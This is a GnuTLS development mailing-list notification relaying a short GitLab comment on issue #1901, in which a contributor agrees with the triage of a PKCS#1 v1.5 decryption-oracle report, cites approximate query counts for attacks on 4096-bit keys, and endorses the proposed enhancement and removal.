[gnutls-devel] GnuTLS | Behavioral PKCS#1 v1.5 decryption oracle (Ok/Err bit) (#1901)
Read-only notification of GnuTLS library development activities
gnutls-devel at lists.gnutls.org
Thu Jun 11 07:03:01 CEST 2026
Mark Esler commented: https://gitlab.com/gnutls/gnutls/-/work_items/1901#note_3444450399
Cheers for the triage @dueno and @tomato42 🙏
And nice fix on the timing channel in #1050. (Alicja, I'd filed this before we spoke and hadn't seen 1050 at the time, overlap's on me.)
Agree that it can be used safety. If an attacker has access to the behavioral (Ok/Err) oracle, against a 4096-bit key it takes ~40k decrypt queries to recover a plaintext and ~110k to forge a signature.
Enhancement + removal sounds good to me.
--
Reply to this email directly or view it on GitLab: https://gitlab.com/gnutls/gnutls/-/work_items/1901#note_3444450399
You're receiving this email because of your account on gitlab.com. Unsubscribe from this thread: https://gitlab.com/-/sent_notifications/5-dulmsuzrji4oqfkcqs29hoyn9-a84t7/unsubscribe | Manage all notifications: https://gitlab.com/-/profile/notifications | Help: https://gitlab.com/help
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.gnupg.org/pipermail/gnutls-devel/attachments/20260611/07fc42a2/attachment.html>
More information about the Gnutls-devel
mailing list